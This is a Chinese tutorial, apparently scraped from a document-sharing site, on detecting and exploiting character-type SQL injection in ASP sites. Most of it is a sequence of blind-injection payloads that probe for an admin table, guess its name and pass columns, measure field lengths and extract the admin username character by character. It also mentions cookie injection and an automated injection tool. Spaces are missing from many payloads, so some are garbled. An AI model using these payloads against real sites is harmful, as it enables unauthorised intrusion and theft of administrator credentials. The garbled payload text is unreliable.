字符型注入的判断和注入方法.docx
- 文档编号:11441695
- 上传时间:2023-03-01
- 格式:DOCX
- 页数:13
- 大小:1.02MB
字符型注入的判断和注入方法.docx
《字符型注入的判断和注入方法.docx》由会员分享,可在线阅读,更多相关《字符型注入的判断和注入方法.docx(13页珍藏版)》请在冰豆网上搜索。
字符型注入的判断和注入方法
字符型注入的判断和注入方法(含实例教程)
判断和注入方法:
有字符型注入:
测试注入语句是:
'and''='这个正常显示
'and''='1 这个不正常显示
如果这两个条件同时出现好就表明有注入(注:
在注入前我们一定要找到后台。
不然白忙了。
今天我们就不找后台了。
主要讲一下字符型注入吧)
在注入前讲几个函数和ASCII码知识:
这些是对应该的十进制和ASCII码,如0的ASCII码是48,一直向前推, 如果还是不了解的话可以用一些工具进行转换
-------------------
0-9 48-57
a--z97-122
A-Z65-90
-------------------
下面是一些VB函数
mid(字符串,n,i) 这个读取字符串的内容,如mid(abcdef,1,1)将显示amid(abcdef,1,2)将显示ab
asc(字符串)这个是显示字符的ASCII码 如asc(0)将显示48
len(字符串)这个是显示字符串的长度 如len(abcd)将显示4
了解了这些我们就开始注入吧
字符注入和其它注入差不多。
先猜表:
andexists(select*from表名)and''='
'andexists(select*fromadmin)and''='显示正常,说明有admin表。
下面来猜字段
'andexists(select这段fromadmin)and''='
网速有点慢呼。
'andexists(selectnamefromadmin)and''='存在字段name
....网速慢的吓人
'andexists(selectpassfromadmin)and''=' 存在字段pass
下面来猜字段的长度
'and(selecttop1len(name)from)>6and''=' 这个用二分法去猜
'and(selecttop1len(name)fromadmin)=5and''='name字段的长度是5
'and(selecttop1len(pass)fromadmin)=5and''=' pass字段长度也是5 应该没有加密过的吧
下面来猜name字段
'and(selecttop1asc(mid(name,1,1))fromadmin)<97and''=' 这个就是说字段name中的第一个字符的ascii码小于97不好意思 , 写反了。
显示正常,就说明name第一个字符是a我们再来猜 第二个吧
'and(selecttop1asc(mid(name,2,1))fromadmin)<97and''='网速太慢了。
可以快进的看。
区'and(selecttop1asc(mid(name,2,1))fromadmin)=100and''=' 我晕。
终于出来了 第二位ascii是100对照ascii表可以看出是d,其它的猜的方法都是一样的, 我就不去猜了, 在手式的时候有一些细节,第一是a第二位是d那我们就去想会不是admin因是是5位吗。
那就去试一下
'and(selecttop1mid(name,1,5)fromadmin)='admin'and''=' 果然是admin吧。
密码就不去猜 了。
实例教程:
目标:
注入点:
判断注入:
返回正常
返回错误
我们来接着猜表:
呵呵,说明存在表:
admin
好,我们来猜解列明:
先来猜解用户名:
我们来猜解密码:
接下来看下长度:
先看下表admin的长度:
长度:
5
好,来猜解password的长度:
看来password的长度是16位,应该是MD5加密的。
内容就不麻烦了,上面都说到了。
其实这个网站还有其他漏洞,注入点:
不错就是cookie注入,我已经本地搭建asp,用啊D猜解出来了
http:
//127.0.0.1/jmCook.asp?
jmdcw=242
如果用啊D直接猜解
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 字符 注入 判断 方法